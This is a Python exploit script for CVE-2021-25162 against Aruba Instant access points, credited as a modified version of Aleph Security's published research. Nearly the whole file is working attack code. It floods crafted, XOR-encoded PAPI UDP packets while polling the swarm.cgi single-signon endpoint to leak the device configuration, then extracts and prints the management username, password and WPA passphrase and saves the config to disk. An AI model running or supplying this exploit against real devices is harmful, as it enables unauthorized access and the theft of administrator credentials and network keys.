CVE-2021-25162.py

#A modified version of Aleph Security's "Aruba in Chains: Chaining Vulnerabilities for Fun and Profit" exploit script.
#Original research: https://alephsecurity.com/2021/07/15/aruba-instant/

import socket
import sys
import struct
import time
import threading
import urllib3
import re
import xml.etree.ElementTree as ET
import requests

urllib3.disable_warnings()

CONTINUE_RACE = True
SNPRINTF_CREATEFILE_MAX_LENGTH = 245


def race_papi_message(ip):

    global CONTINUE_RACE

    payload = b"\x49\x72"
    payload += b"\x00\x03"
    payload += b"\x7F\x00\x00\x01"
    payload += b"\x7F\x00\x00\x01"
    payload += b"\x00\x00"
    payload += b"\x00\x00"
    payload += b"\x3B\x7E"
    payload += b"\x41\x41"
    payload += b"\x04\x22"
    payload += b"\x00\x00"
    payload += b"\x02\x00"
    payload += b"\x00\x00"
    payload += b"\x00" * 12 * 4
    text_to_send = bytes()
    for i in "msg_ref 3000 /tmp/cfg-plaintext\x00":
        text_to_send += struct.pack("B", int(ord(i)) ^ 0x93)

    packet = payload + text_to_send

    while CONTINUE_RACE:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect((ip, 8211))
        s.send(packet)
        s.close()
	#Default setting for sleep is 0.004 may need to lower as needed.
        time.sleep(0.004)


def find_credentials(text):
    res = re.search("mgmt-user .*", text)[0]
    res = res.split(" ")
    return (res[1], res[4])

#Test function for WPA-Key
def find_wpakey(text):
    res = re.search("wpa-passphrase .*", text)[0]
    res = res.split(" ")
    return (res[1])

def main():

    global CONTINUE_RACE

    ip = sys.argv[1]

    print("[*] Starting the PAPI race thread")
    papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))
    papi_thread.start()

    while CONTINUE_RACE:
        time.sleep(0.1)
        res = requests.get("https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip), timeout=3, verify=False)
        if "version" in res.text:
            print("[+] Successfully leaked the password from config")
            CONTINUE_RACE = False

    file_content = re.findall("var SESSION_ID = '(.*?)';", res.text, re.S)[0]
    user, password = find_credentials(file_content)
    wpa = find_wpakey(file_content)

    print("[+] Successfully extracted username: {} and password: {}".format(user, password))
    print("[+] Successfully extracted WPA KEY: {}".format(wpa))
    #Test output
    print("[+] Writing config to Aruba-Config.txt")
    f = open("Aruba-Config.txt", "x") 
    f.write(file_content)
    f.close()

if __name__ == "__main__":
    main()